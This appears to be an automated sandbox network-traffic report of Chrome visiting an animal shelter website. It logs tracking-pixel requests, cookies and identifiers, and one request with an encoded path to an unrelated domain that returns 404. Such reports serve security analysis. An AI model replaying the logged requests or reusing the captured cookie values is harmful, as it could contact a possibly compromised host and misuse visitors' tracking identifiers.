                                                                                                                                                                                                                                                        Data Ascii: 1000IPX47OZbbOxE2iYjq4d/etFZieeHr3GfhdvHvBvczXdGjbOY7RkLow5okDoy4ggE4+VgtvMpuTucIzXDx6RGHg28uh6toExg1a2ks531IbLH2bjyOIcNuHMsYznExha0THJjaDr1rprpGut7a9he4VbcVBB5Os04d9dezve3PGuphal7xjL06w4ybvgR215BJp8jRlyuOaMUHI7avZ2fzFMca4eTufjbZznLqLLeTT9SgE9nOyVh20IqO
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 61 34 6e 6f 43 43 36 4e 34 59 38 50 79 68 39 4e 6a 58 59 69 76 4a 55 49 4c 70 4c 69 53 56 67 45 76 58 65 44 55 53 48 79 71 48 31 50 63 51 61 44 65 4c 39 70 44 33 44 36 61 44 54 6f 50 30 71 34 54 2f 77 75 33 52 2f 30 61 77 2f 35 5a 69 44 71 6b 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 42 2b 64 66 48 37 2b 4d 75 39 6e 2b 65 64 2b 6f 31 42 35 2b 67 37 43 48 39 6a 48 2b 69 33 30 6b 46 36 41 67 49 4b 74 38 70 76 64 48 70 71 61 38 34 52 62 6c 50 38 4f 6c 45 44 53 56 39 55 2b 4f 31 53 76 38 41 4e 33 44 6b 71 70 68 47 70 55 51 46 57 68 58 55 76 45 4a 43 6c 57 62 4a 57 78 46 53 72 4e 6b 6a 59 75
                                                                                                                                                                                                                                                        Data Ascii: 1000a4noCC6N4Y8Pyh9NjXYivJUILpLiSVgEvXeDUSHyqH1PcQaDeL9pD3D6aDToP0q4T/wu3R/0aw/5ZiDqkBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBB+dfH7+Mu9n+ed+o1B5+g7CH9jH+i30kF6AgIKt8pvdHpqa84RblP8OlEDSV9U+O1Sv8AN3DkqphGpUQFWhXUvEJClWbJWxFSrNkjYu
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 4b 38 69 61 7a 51 76 45 48 51 6d 70 62 51 76 46 73 6d 70 4f 68 65 4c 62 6f 55 61 6b 36 56 77 74 65 68 4e 52 70 58 65 62 64 43 61 6c 74 43 34 57 77 35 6c 45 32 4e 4b 34 57 79 61 6b 36 45 6a 4c 4f 72 61 34 55 48 4f 56 57 62 72 52 74 72 32 32 77 35 68 33 55 31 4a 30 4a 6d 32 30 65 77 31 72 30 4b 75 70 62 53 75 38 32 48 49 45 31 47 6c 55 57 35 35 6b 31 4a 30 72 78 62 6b 38 69 6a 55 74 70 58 4e 74 71 38 69 6a 55 6e 51 6b 62 61 6e 6d 55 61 30 36 55 67 74 54 7a 4b 4e 53 32 68 64 35 71 65 5a 52 71 57 30 72 78 61 39 43 6a 57 74 46 56 66 4e 54 7a 4b 4e 61 30 55 58 69 7a 4b 72 72 61 52 74 71 2b 5a 4a 72 54 37 53 33 7a 54 6f 54 57 65 30 47 31 77 32 4a 72 56 39 74 59 62 62 6f 55 36 6c 64 43 77 77 45 34 55 77 54 55 72 6f 57 47 33 50 4d 70 31 49 30 72
                                                                                                                                                                                                                                                        Data Ascii: 1000K8iazQvEHQmpbQvFsmpOheLboUak6VwtehNRpXebdCaltC4Ww5lE2NK4Wyak6EjLOra4UHOVWbrRtr22w5h3U1J0Jm20ew1r0KupbSu82HIE1GlUW55k1J0rxbk8ijUtpXNtq8ijUnQkbanmUa06UgtTzKNS2hd5qeZRqW0rxa9CjWtFVfNTzKNa0UXizKrraRtq+ZJrT7S3zToTWe0G1w2JrV9tYbboU6ldCwwE4UwTUroWG3PMp1I0r


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        144192.168.2.44992952.208.198.1584432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC552OUTGET /demconf.jpg?et:ibs%7cdata:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                        Host: dpm.demdex.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: demdex=01656638509830825063211454695126882067; dpm=01656638509830825063211454695126882067
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:20 GMT
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        X-TID: xwlvQ/7QS64=
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                        P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        DCS: dcs-prod-irl1-1-v069-00620ed93.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                        set-cookie: dpm=01656638509830825063211454695126882067; Max-Age=15552000; Expires=Tue, 08 Jul 2025 01:59:20 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                        set-cookie: demdex=01656638509830825063211454695126882067; Max-Age=15552000; Expires=Tue, 08 Jul 2025 01:59:20 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        145192.168.2.449928157.240.251.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC616OUTGET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                        Server: proxygen-bolt
                                                                                                                                                                                                                                                        X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=10, mss=1392, tbw=3405, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:20 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        146192.168.2.449930157.240.251.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC653OUTGET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7457729502044138278", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7457729502044138278"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                        Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        147192.168.2.44993152.17.153.1814432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC629OUTGET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y HTTP/1.1
                                                                                                                                                                                                                                                        Host: sync.crwdcntrl.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: _cc_dc=1; _cc_id=b8425e6f88cd7ce9278ed5f3930daaad; _cc_cc="ACZ4nGNQSLIwMTJNNUuzsEhOMU9OtTQyt0hNMU0ztjQ2SElMTExhAIL0et0KBgQAAGOfCxA%3D"; _cc_aud="ABR4nGNgYGBIr9etYIADABNrAYw%3D"
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC280INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:21 GMT
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Content-Length: 49
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-Server: 10.45.0.39
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC49INData Raw: 47 49 46 38 39 61 01 00 01 00 91 ff 00 ff ff ff 00 00 00 c0 c0 c0 00 00 00 21 f9 04 01 00 00 02 00 2c 00 00 00 00 01 00 01 00 00 02 02 54 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,T;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        148192.168.2.449934185.76.79.504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:22 UTC430OUTGET /w1EdyrhzfqOncyf49WIx6LAleLrhaz+rrTBxs7k0QqyzczHosXMn6Kk3b7OhM2e5qCRnsrsiP7c= HTTP/1.1
                                                                                                                                                                                                                                                        Host: virtual.urban-orthodontics.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:24 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:24 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:24 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                                                        2025-01-09 01:59:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        149192.168.2.449937157.240.0.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:22 UTC1437OUTGET /tr/?id=1174527456525563&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961160&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:22 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                        Server: proxygen-bolt
                                                                                                                                                                                                                                                        X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=10, mss=1392, tbw=3405, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:22 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:20:58:56
                                                                                                                                                                                                                                                        Start date:08/01/2025
                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                        Start time:20:58:58
                                                                                                                                                                                                                                                        Start date:08/01/2025
                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1612,i,14363034678728640408,9950297544825617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                        Start time:20:59:05
                                                                                                                                                                                                                                                        Start date:08/01/2025
                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://indyhumane.org"
                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        No disassembly